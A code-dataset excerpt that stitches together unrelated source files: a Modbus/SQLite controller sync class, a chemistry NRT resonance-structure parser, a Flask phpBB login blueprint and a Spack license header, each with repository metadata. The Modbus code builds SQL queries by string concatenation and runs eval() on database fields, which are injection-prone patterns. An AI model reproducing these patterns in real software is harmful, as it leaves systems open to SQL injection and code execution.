mcount=0
cur = conn.cursor()
cur3 = conn.cursor()
ts_created=self.ts # selle loeme teenuse ajamargiks
try:
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
# 0 1 2 3 4 5 6 7
#mba,regadd,bit,bootvalue,value,rule,desc,comment
Cmd="select aochannels.mba,aochannels.regadd,aochannels.value,aochannels.mbi from aochannels left join aichannels \
on aochannels.mba = aichannels.mba AND aochannels.mbi = aichannels.mbi AND aochannels.regadd = aichannels.regadd \
where aochannels.value != aichannels.value" #
# the command above retrieves mba, regadd and value where values do not match in aichannels and aochannels
#print "Cmd=",Cmd
cur.execute(Cmd)
for row in cur: # got mba, regadd and value for registers that need to be updated / written
regadd=0
mba=0
if row[0] != '':
mba=int(row[0]) # must be a number
if row[1] != '':
regadd=int(row[1]) # must be a number
if row[1] != '':
value=int(float(row[2])) # komaga nr voib olla, teha int!
msg='write_aochannels: going to write value '+str(value)+' to register mba.regadd '+str(mba)+'.'+str(regadd)
print(msg) # debug
#syslog(msg)
#client.write_register(address=regadd, value=value, unit=mba)
''' write(self, mba, reg, type = 'h', **kwargs):
:param 'mba': Modbus device address
:param 'reg': Modbus register address
:param 'type': Modbus register type, h = holding, c = coil
:param kwargs['count']: Modbus registers count for multiple register write
:param kwargs['value']: Modbus register value to write
:param kwargs['values']: Modbus registers values array to write
'''
respcode=respcode+mb[mbi].write(mba=mba, reg=regadd,value=value)
conn.commit() # transaction end - why?
return 0
except:
msg='problem with aochannel - aichannel sync!'
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
return 1
# write_aochannels() end. FRESHENED DICHANNELS TABLE VALUES AND CGH BITS (0 TO SEND, 1 TO PROCESS)
def get_aivalue(self,svc,member): # returns raw,value,lo,hi,status values based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd3="BEGIN IMMEDIATE TRANSACTION" # conn3, et ei saaks muutuda lugemise ajal
conn3.execute(Cmd3)
Cmd3="select value,outlo,outhi,status from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
#Cmd3="select raw,value,outlo,outhi,status,mba,regadd,val_reg,member from aichannels where val_reg='"+svc+"' and member='"+str(member)+"'" # debug. raw ei tule?
#print(Cmd3) # debug
cursor3.execute(Cmd3)
raw=0
value=None
outlo=0
outhi=0
status=0
found=0
for row in cursor3: # should be one row only
#print(repr(row)) # debug
found=1
#raw=int(float(row[0])) if row[0] != '' and row[0] != None else 0
value=int(float(row[0])) if row[0] != '' and row[0] != None else 0
outlo=int(float(row[1])) if row[1] != '' and row[1] != None else 0
outhi=int(float(row[2])) if row[2] != '' and row[2] != None else 0
status=int(float(row[3])) if row[3] != '' and row[3] != None else 0
if found == 0:
msg='get_aivalue failure, no member '+str(member)+' for '+svc+' found!'
print(msg)
#syslog(msg)
conn3.commit()
#print('get_aivalue ',svc,member,'value,outlo,outhi,status',value,outlo,outhi,status) # debug
return value,outlo,outhi,status
def set_aivalue(self,svc,member,value): # sets variables like setpoints or limits to be reported within services, based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aichannels set value='"+str(value)+"' where val_reg='"+svc+"' and member='"+str(member)+"'"
#print(Cmd) # debug
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aivalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aovalue(self, value,mba,reg): # sets variables to control, based on physical addresses
#(mba,regadd,bootvalue,value,ts,rule,desc,comment)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aochannels set value='"+str(value)+"' where regadd='"+str(reg)+"' and mba='"+str(mba)+"'"
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aovalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aosvc(self,svc,member,value): # to set a readable output channel by the service name and member using dichannels table
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer) # ai
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
Cmd="select mba,regadd from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
cur=conn.cursor()
cur.execute(Cmd)
mba=None
reg=None
for row in cur: # should be one row only
try:
mba=row[0]
reg=row[1]
set_aovalue(value,mba,reg)
conn.commit()
return 0
except:
msg='set_aovalue failed for reg '+str(reg)+': '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1
def make_aichannels(self,svc = ''): # send the ai service messages to the monitoring server (only if fresh enough, not older than 2xappdelay). all or just one svc.
mba=0
val_reg=''
desc=''
cur=conn.cursor()
ts_created=self.ts # selle loeme teenuse ajamargiks
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3, kogu selle teenustegrupiga (aichannels) tegelemine on transaction
conn.execute(Cmd)
if svc == '': # all services
Cmd="select val_reg from "+self.in_sql+" group by val_reg"
else: # just one
Cmd="select val_reg from "+self.in_sql+" where val_reg='"+svc+"'"
cur.execute(Cmd)
for row in cur: # services
val_reg=row[0] # teenuse nimi
sta_reg=val_reg[:-1]+"S" # nimi ilma viimase symbolita ja S - statuse teenuse nimi, analoogsuuruste ja temp kohta
if self.make_aichannel_svc(val_reg,sta_reg) == 0: # successful svc insertion into buff2server
pass
#print('tried to report svc',val_reg,sta_reg)
else:
print('make_aichannel FAILED to report svc',val_reg,sta_reg)
return 1 #cancel
conn.commit() # aichannels transaction end
except:
msg='PROBLEM with aichannels reporting '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def make_aichannel_svc(self,val_reg,sta_reg): #
''' make a single service record (with status chk) based on aichannel members and send it away to UDPchannel '''
status=0 # initially
cur=conn.cursor()
lisa=''
#print 'reading aichannels values for val_reg',val_reg,'with',mcount,'members' # ajutine
Cmd="select * from "+self.in_sql+" where val_reg='"+val_reg+"'" # loeme yhe teenuse kogu info uuesti
#print Cmd3 # ajutine
cur.execute(Cmd) # another cursor to read the same table
mts=0 # max timestamp for svc members. if too old, skip messaging to server
for srow in cur: # service members
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
ostatus=0 # eelmine
#tvalue=0 # test, vordlus
oraw=0
ovalue=0 # previous (possibly averaged) value
ots=0 # eelmine ts value ja status ja raw oma
avg=0 # keskmistamistegur, mojub alates 2
#desc=''
#comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # aichannels
mba=int(srow[0]) if srow[0] != '' else 0 # must be int! will be -1 if empty (setpoints)
regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! will be -1 if empty
val_reg=srow[2] # see on string
member=int(srow[3]) if srow[3] != '' else 0
cfg=int(srow[4]) if srow[4] != '' else 0 # konfibait nii ind kui grp korraga, esita hex kujul hiljem
x1=int(srow[5]) if srow[5] != '' else 0
x2=int(srow[6]) if srow[6] != '' else 0
y1=int(srow[7]) if srow[7] != '' else 0
y2=int(srow[8]) if srow[8] != '' else 0
outlo=int(srow[9]) if srow[9] != '' else None
outhi=int(srow[10]) if srow[10] != '' else None
avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, values 0 and 1 do not average!
#block=int(srow[12]) if srow[12] != '' else 0 # - loendame siin vigu, kui kasvab yle 3? siis enam ei saada
oraw=int(srow[13]) if srow[13] != '' else 0
value=float(srow[14]) if srow[14] != '' else 0 # teenuseliikme vaartus
ostatus=int(srow[15]) if srow[15] != '' else 0 # teenusekomponendi status - ei kasuta
ots=eval(srow[16]) if srow[16] != '' else 0
#desc=srow[17]
#comment=srow[18]
################ sat
# ai svc STATUS CHK. check the value limits and set the status, according to configuration byte cfg bits values
# use hysteresis to return from non-zero status values
status=0 # initially for each member
if value>outhi: # above hi limit
if (cfg&4) and status == 0: # warning
status=1
if (cfg&8) and status<2: # critical
status=2
if (cfg&12) == 12: # not to be sent
status=3
#block=block+1 # error count incr
else: # return with hysteresis 5%
if value>outlo and value<outhi-0.05*(outhi-outlo): # value must not be below lo limit in order for status to become normal
status=0 # back to normal
# block=0 # reset error counter
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning
status=1
if (cfg&2) and status<2: # critical
status=2
if (cfg&3) == 3: # not to be sent, unknown
status=3
#block=block+1 # error count incr
else: # back with hysteresis 5%
if value<outhi and value>outlo+0.05*(outhi-outlo):
status=0 # back to normal
#block=0
#############
#print 'make ai mba ots mts',mba,ots,mts # debug
if mba>0:
if ots>mts:
mts=ots # latest member timestamp for the current service
if lisa != '': # not the first member
lisa=lisa+' ' # separator between member values
lisa=lisa+str(value) # adding member values into one string
# service done
if self.ts-mts < 3*self.readperiod and status<3: # data fresh enough to be sent
sendtuple=[sta_reg,status,val_reg,lisa] # sending service to buffer
# print('ai svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
else:
msg='skipping ai data send (buff2server wr) due to stale aichannels data, reg '+val_reg+',mts '+str(mts)+', ts '+str(self.ts)
#syslog(msg) # incl syslog
print(msg)
return 1
return 0
def doall(self): # do this regularly, executes only if time is is right
''' Does everything on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read > self.readperiod:
self.ts_read = self.ts
self.sync_ai() #
self.sync_ao() # writes output registers to be changed via modbus, based on feedback on di bits
if self.ts - self.ts_send > self.sendperiod:
self.ts_send = self.ts
self.make_aichannels() # compile services and send away
return 0
| gpl-3.0 | 2,982,232,896,375,325,000 | 45.240773 | 195 | 0.520505 | false |
mtthwflst/terse | Parsers/NRT.py | 1 | 24648 | if __name__ == "__main__":
import sys,os
selfname = sys.argv[0]
full_path = os.path.abspath(selfname)[:]
last_slash = full_path.rfind('/')
dirpath = full_path[:last_slash] + '/..'
print "Append to PYTHONPATH: %s" % (dirpath)
sys.path.append(dirpath)
import copy, string
import math
import numpy
import time,re,logging
from math import sqrt
from Tools import web
from Tools.BetterFile import BetterFile
from Top import Top
from Containers import Topology, AtomicProps
log = logging.getLogger(__name__)
class bondM(Top):
"""
This class represents a resonance structure
"""
def __init__(self, nA, symbols, data, name=''):
self.symbols = symbols
self.data = data
self.name = name
if self.symbols == []:
for i in range(nA):
self.symbols.append("")
if self.data == []:
for i in range(nA):
tmp = []
for j in range(nA):
tmp.append(0)
self.data.append(tmp)
self.wg = 0.0
"""
*
"""
def __getitem__(self,key):
return self.data[key]
"""
*
"""
def __lt__(self, other):
return self.wg < other.wg
"""
*
"""
def __eq__(self, other, CheckSymbols = True):
"""
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
"""
if CheckSymbols:
match = True
for i in range(len(self.symbols)):
if (self.symbols[i] != other.symbols[i]) \
and (self.symbols[i].upper() != 'X') \
and (other.symbols[i].upper() != 'X'):
match = False
break
if not match:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data[i])):
if self.data[i][j] != other.data[i][j]:
return False
return True
"""
*
"""
def __sub__(self,other, CheckSymbols = False):
diff = copy.deepcopy(self)
"""
Subtracts two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with difference
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
diff[i][j] = self[i][j] - other[i][j]
return diff
"""
*
"""
def __add__(self,other, CheckSymbols = False):
sm = copy.deepcopy(self)
"""
Adds two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with sums
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
sm[i][j] = self[i][j] + other[i][j]
return sm
"""
*
"""
def __str__(self):
return self.as_matrix()
"""
*
"""
def as_matrix(self):
"""
:returns: a string with resonance structure in matrix format
:rtype: str
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for b in self.data[i]:
if b == 0:
tStr += " . "
else:
tStr += " %1i " % (b)
tStr += "\n"
return tStr
"""
*
"""
def offDiag(self):
"""
:returns: only off-diagonal elements thus removing information about lone pairs
:rtype: Instance of class bondM
"""
od = copy.deepcopy(self)
for i in range(len(od.data)):
od.data[i][i] = 0
return od
"""
*
"""
def offDiagEQ(self, other):
if self.symbols != other.symbols:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data)):
if i == j:
continue
if self.data[i][j] != other[i][j]:
return False
return True
"""
*
"""
def subset(self, subset):
"""
:param subset: a list of indices of selected atoms
:returns: a submatrix, which is a matrix including only selected atoms
:rtype: instance of class bondM
"""
nA = len(self.data)
# curiously enough, we need to explicitly provide optional empty data, otherwise it will copy the data of the
# current instance!
smallM = bondM(len(subset),symbols = [], data =[])
for i in range(len(subset)):
smallM.symbols[i] = self.symbols[subset[i]-1]
for j in range(len(subset)):
smallM[i][j] = self.data[subset[i]-1][subset[j]-1]
return smallM
"""
*
"""
def as_lines(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " STR !"
if self.name:
s += " name="+self.name+','
s+= " weight="+str(self.wg)+','
s+= " symbols="+self.writeSymbols()
s += "\n LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n END\n"
return s
"""
*
"""
def as_choose(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n"
return s
"""
*
"""
def applyMatrix(self, matrix, row=0 ,col=0):
"""
Implements elements of a matrix into self. See source for detailed example
"""
"""
A.data = X X X X X, B = Y Y, row=1,col=1 A.data = X X X X X
X X X X X Y Y A.applyMatrix(B,1,1) => X Y Y X X
X X X X X X Y Y X X
X X X X X X X X X X
X X X X X X X X X X
"""
nX = len(matrix)
nY = len(matrix[0])
for i in range(nX):
for j in range(nY):
self.data[row+i][col+j] = matrix[i][j]
"""
*
"""
def applySubset(self, other, subset):
"""
Updates connectivity matrix for atoms in subset with connectivity matrix given in object of class bondM
"""
for i in range(len(subset)):
for j in range(len(subset)):
self.data[subset[i]-1][subset[j]-1] = other.data[i][j]
"""
*
"""
def writeSymbols(self):
"""
converts the list of chemical symbols into string
"""
s = ''
for Symbol in self.symbols:
if s:
s += ' '
if Symbol == '':
s += '-'
else:
s += Symbol
return s
"""
*
"""
def applyStringSymbols(self,s):
"""
converts the a string with chemical symbols into list and applies it to the object
"""
syms = s.split(' ')
for i in range(len(syms)):
if syms[i]=='-':
syms[i]=''
self.symbols = syms
"""
*
"""
def diffColor(self,other):
"""
Compares self and other matrices.
The result is a string representing a difference matrix. The elements that differ are highlighted.
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for j in range(len(self.data[i])):
if self.data[i][j] != other[i][j]:
tStr += '\033[1;31m'
if self.data[i][j] == 0:
tStr += " . "
else:
tStr += " %1i " % (self.data[i][j])
if self.data[i][j] != other[i][j]:
tStr += '\033[0;00m'
tStr += "\n"
return tStr
"""
*
"""
def pic(self,filename,picformat='svg'):
"""
Generates a graphical file with 2D-representation of the resonance structure
"""
try:
import openbabel as ob
except:
print "Cannot import openbabel"
return
#ValEl = {'H':1, 'B':3,'C':4,'N':5,'O':6,'F':7,'S':6}
#ValEl = {'1':1, '5':3,'6':4,'7':5,'8':6,'9':7,'16':6}
# Import Element Numbers
ati = []
Sym2Num = ob.OBElementTable()
for a in self.symbols:
ElNum = Sym2Num.GetAtomicNum(a)
ati.append(ElNum)
# Import connections
conn = self.data
mol = ob.OBMol()
# Create atoms
for a in ati:
at = ob.OBAtom()
at.SetAtomicNum(a)
mol.AddAtom(at)
# Create connections
val = []
total_LP = 0
for i in range(len(conn)):
total_LP += conn[i][i]
for i in range(len(conn)):
val.append(conn[i][i] * 2)
for j in range(i):
if conn[i][j]==0:
continue
val[i] += conn[i][j]
val[j] += conn[i][j]
atA = mol.GetAtomById(i)
atB = mol.GetAtomById(j)
b = ob.OBBond()
b.SetBegin(atA)
b.SetEnd(atB)
b.SetBO(int(conn[i][j]))
mol.AddBond(b)
for i in range(len(conn)):
atA = mol.GetAtomById(i)
atAN = atA.GetAtomicNum()
FormValEl = CountValenceEl(atAN)
#if total_LP == 0:
# if atAN == 1:
# FullShell = 2
# else:
# FullShell = 8
# FormCharge = FormValEl + int(val[i]) - FullShell
#else:
FormCharge = int(FormValEl - val[i])
#print "atAN, FormValEl, val[i], FullShell"
#print atAN, FormValEl, val[i], FullShell
#FormCharge = FormCharge % 2
atA.SetFormalCharge(FormCharge)
# Export file
mol.DeleteNonPolarHydrogens()
conv = ob.OBConversion()
conv.SetOutFormat(picformat)
conv.AddOption('C')
conv.WriteFile(mol,filename)
#print val
#c2 = ob.OBConversion()
#c2.SetOutFormat('mol2')
#print c2.WriteString(mol)
def CountValenceEl(x):
"""
Returns a number of valence electrons among the x electrons.
"""
x = int(x)
nmax = int(sqrt(x/2))
val = x
for i in range(nmax+1):
n = 2*i*i
if n < val:
val -= n
return val
class NRT(Top):
"""
This class represents a collection of resonance structures.
"""
def __init__(self):
self.FI = None
self.options = ''
self.NBO_version = ''
self.structures = []
self.symbols = []
def parse(self):
if self.FI:
FI = self.FI
else:
FI = BetterFile(self.file)
def read(self, fInp='',fType=''):
if fType=='matrix':
self.read_matrix(fInp)
elif fType=='lines':
self.read_lines(fInp)
elif not self.read_matrix(fInp):
self.read_lines(fInp)
def __str__(self):
return self.as_lines()
def __len__(self):
return len(self.structures)
def __getitem__(self,key):
return self.structures[key]
def write(self,file):
f = open(file,'w')
f.write(str(self))
f.close()
def sortByWg(self):
"""
Sorts resonance structures by weight in descending order
"""
self.structures = sorted(self.structures, key = lambda k: k.wg, reverse = True)
def as_lines(self):
"""
Returns a string with resonance structures written as in the end of .nbout file
"""
s = " $NRTSTR\n"
if self.symbols:
s = s + " !SYMBOLS " + str(self.symbols) + "\n"
for rs in self.structures:
s = s + rs.as_lines()
return s + " $END\n"
"""
*
"""
def totalWg(self):
"""
Returns sum of weights of resonance structures
"""
sm = 0
for mtrx in self.structures:
sm += mtrx.wg
return sm
"""
*
"""
def byName(self,name):
"""
Returns a resonance structure (instance of class bondM) with a given name
"""
for rs in self.structures:
if rs.name == name:
return rs
"""
*
"""
def patternsOfSubset(self,subset,OffDiag = False):
"""
Returns connectivity patterns for a given subset of atoms.
Weights of these patterns are calculated.
"""
Patterns = SetOfResStr()
for i_mtrx in range(len(self.structures)):
mtrx = self.structures[i_mtrx]
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
Patterns.structures[i].indices.append(i_mtrx)
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
Patterns.structures[-1].indices = [i_mtrx,]
"""
for mtrx in self.structures:
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
"""
return Patterns
"""
*
"""
def getWeights(self,NBO_RS):
"""
Updates weights of reference structures, if they are found in NBO_RS
:param NBO_RS: an object of class SetOfResStr, where resonance structures will be looked for.
"""
for mtrx in self.structures:
mtrx.wg = 0
if mtrx in NBO_RS.structures:
iPat = NBO_RS.structures.index(mtrx)
mtrx.wg = NBO_RS.structures[iPat].wg
mtrx.indices = NBO_RS.structures[iPat].indices
"""
*
"""
def offDiag(self):
"""
Returns an instance of SetOfResStr class with zeroed diagonal elements of resonance structure matrices
(in other words, with lone pairs removed)
"""
od = copy.deepcopy(self)
for i in range(len(self.structures)):
od.structures[i] = self.structures[i].offDiag()
return od
"""
*
"""
def read_matrix(self,fInp = ''):
"""
Reading the resonance structs. This can handle split TOPO matrices determine the number of atoms
"""
if fInp:
try:
inp = open(fInp,'r')
except:
print '[Warning]: cannot open %s' % (fInp)
return
else:
inp = sys.stdin
s = inp.readline()
while s:
if "Atom distance matrix:" in s:
break
s = inp.readline()
inp.readline()
inp.readline()
inp.readline()
nAtoms = 0
s = inp.readline()
while s:
# atom numbers go like "1." so they must convert into a float, if not then we are done
try:
float(s.split()[0])
except:
break
nAtoms += 1
s = inp.readline()
# read the main structure
main = bondM(nAtoms,[],[])
s = inp.readline()
while s:
if "TOPO matrix for" in s:
break
s = inp.readline()
inp.readline()
atomsPerLine = len(inp.readline().split()) -1
nPasses = int(math.ceil(float(nAtoms)/atomsPerLine))
inp.readline()
for aPass in range(nPasses):
for i in range(nAtoms):
L = inp.readline().split()
main.symbols[i]=L[1]
for j in range(len(L)-2):
main[i][aPass*atomsPerLine+j] = int(L[j+2])
if aPass < nPasses - 1:
inp.readline()
inp.readline()
inp.readline()
s = inp.readline()
while s:
if "---------------------------" in s:
break
s = inp.readline()
# here comes the parsing of the other structs
# the main first , just the %
line = inp.readline()
try:
main.wg = float(line[10:17])
except:
return False
struct_lns = []
line = inp.readline()
while line:
if "---------------------------" in line:
break
if line[4] == " ":
struct_lns[-1] += line.strip("\n")[18:]
else:
struct_lns.append(line.strip("\n"))
line = inp.readline()
allStructs = []
allStructs.append(main)
for tStr in struct_lns:
tmpM = copy.deepcopy(main)
tmpM.wg = float(tStr[10:17])
#print tStr
dontInclude = False
for mod in tStr[18:].split(','):
mod = mod.strip()
if len(mod.split()) == 0:
dontInclude = True
break
increment = 0
if mod[0] == "(":
increment -= 1
aList = mod.strip("()").split("-")
else:
increment += 1
aList = mod.split("-")
aL2 = []
for aL in aList:
aL2.append(int(aL.strip(string.letters+" "))-1)
if len(aL2) == 2:
tmpM[aL2[0]][aL2[1]] += increment
tmpM[aL2[1]][aL2[0]] += increment
elif len(aL2) == 1:
tmpM[aL2[0]][aL2[0]] += increment
if not dontInclude:
allStructs.append(tmpM)
self.structures = allStructs
if allStructs:
return True
else:
return False
#
# Done reading the reson structs.
#
"""
*
"""
def read_lines(self,fInp=''):
"""
Reads NRT strings given in the format of $NRTSTR, $CHOOSE groups
"""
allStructs = []
if fInp:
inp = open(fInp,'r')
else:
inp = sys.stdin
BondTypes = {'S':1,'D':2,'T':3}
NAtoms = 0
inside = False
while True:
s = inp.readline().strip('\n')
if not s:
break
if "$END" in s:
continue
if "STR" in s:
inside = True
LP, Bonds, props = {}, {}, {}
if "!" in s:
all_params = s.split('!')[1]
for param in all_params.split(','):
name_value = param.split('=')
if len(name_value)>1:
props[name_value[0].strip()] = name_value[1].strip()
continue
if inside and "LONE" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,2):
LP[tmp[i]] = tmp[i+1]
NAtoms = max(NAtoms,int(tmp[i]))
#print "Lone Pairs:\n",LP
continue
if inside and "BOND" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,3):
#print tmp,i
#print tmp[i],tmp[i+1],tmp[i+2]
BondType, smaller, higher = tmp[i], tmp[i+1],tmp[i+2]
NAtoms = max(NAtoms,int(higher))
if not higher in Bonds:
Bonds[higher] = {}
Bonds[higher][smaller]=BondType
continue
if "END" in s:
inside = False
# Fill data
data = numpy.zeros((NAtoms,NAtoms))
for i in LP:
data[int(i)-1,int(i)-1] = LP[i]
for i in Bonds:
for j in Bonds[i]:
ii = int(i) -1
jj = int(j) -1
data[ii,jj] = BondTypes[Bonds[i][j]]
data[jj,ii] = data[ii,jj]
ResStr = bondM(NAtoms,symbols=[],data=data)
if 'name' in props:
ResStr.name = props['name']
if 'symbols' in props:
ResStr.applyStringSymbols(props['symbols'])
if 'weight' in props:
ResStr.wg = float(props['weight'])
allStructs.append(ResStr)
self.structures = allStructs
if __name__ == "__main__":
DebugLevel = logging.DEBUG
logging.basicConfig(level=DebugLevel)
from Settings import Settings
Top.settings = Settings(FromConfigFile = True)
f = NRT()
f.file = sys.argv[1]
f.parse()
print f
| mit | 3,443,818,888,662,613,500 | 28.625 | 117 | 0.438737 | false |
ser/topitup | login_bp.py | 1 | 3595 | # Flask modules
from flask import (
Blueprint,
render_template,
redirect,
url_for,
request,
flash,
g
)
# FLask Login
from flask_login import (
login_user,
logout_user,
current_user
)
# WTForms
from flask_wtf import Form, RecaptchaField
from wtforms import StringField, SubmitField, PasswordField, BooleanField
from wtforms.validators import DataRequired
# Import password / encryption helper tools
# AVOID flask-bcrypt extension, it does not work with python 3.x
import bcrypt
# our own modules
from topitup import db
from nav import (
nav,
top_nav
)
# Let's start!
login_bp = Blueprint('login_bp', __name__)
# Structure of User data located in phpBB
class User(db.Model):
__tablename__ = "phpbb_users"
id = db.Column('user_id', db.Integer, primary_key=True)
username = db.Column('username_alias', db.String(63),
unique=True, index=True)
password = db.Column('user_password', db.String(255))
email = db.Column('user_email', db.String(100), unique=True, index=True)
posts = db.Column('user_posts', db.Integer)
avatar = db.Column('user_avatar', db.String(255))
neuro = db.Column('neuro', db.Numeric(12, 2))
def __init__(self, username, password, email, posts, avatar, neuro):
self.username = username
self.password = password
self.email = email
self.posts = posts
self.avatar = avatar
self.neuro = neuro
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
def __repr__(self):
return '<User %r>' % (self.username)
# Login Form
class LoginForm(Form):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember me')
recaptcha = RecaptchaField('Spam protection')
submit = SubmitField("Log me in")
@login_bp.before_request
def before_request():
try:
g.user = current_user.username.decode('utf-8')
g.email = current_user.email.decode('utf-8')
# amount of Credits in user's account
g.credits = current_user.neuro
g.user_id = current_user.id
except:
g.user = None
g.credits = None
nav.register_element('top_nav', top_nav(g.user, g.credits))
@login_bp.route('/login', methods=('GET', 'POST'))
def index():
form = LoginForm()
if form.validate_on_submit():
username = request.form['username']
password = request.form['password']
password = password.encode('utf-8') # required by bcrypt
remember_me = False
if 'remember_me' in request.form:
remember_me = True
try:
sql_user_query = User.query.filter_by(username=username).first()
pwhash = sql_user_query.password.decode('utf-8')
pwhash = pwhash.encode('utf-8') # required by bcrypt
userid = sql_user_query.id
if userid and bcrypt.hashpw(password, pwhash) == pwhash:
login_user(sql_user_query, remember=remember_me)
flash('Logged in successfully', 'info')
return redirect('/')
except:
flash('Username or Password is invalid', 'error')
return redirect('/login')
return render_template('login.html', form=form)
@login_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('frontend.index'))
| agpl-3.0 | 2,974,913,591,940,286,500 | 26.234848 | 76 | 0.624478 | false |
lgarren/spack | var/spack/repos/builtin/packages/eccodes/package.py | 1 | 4223 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
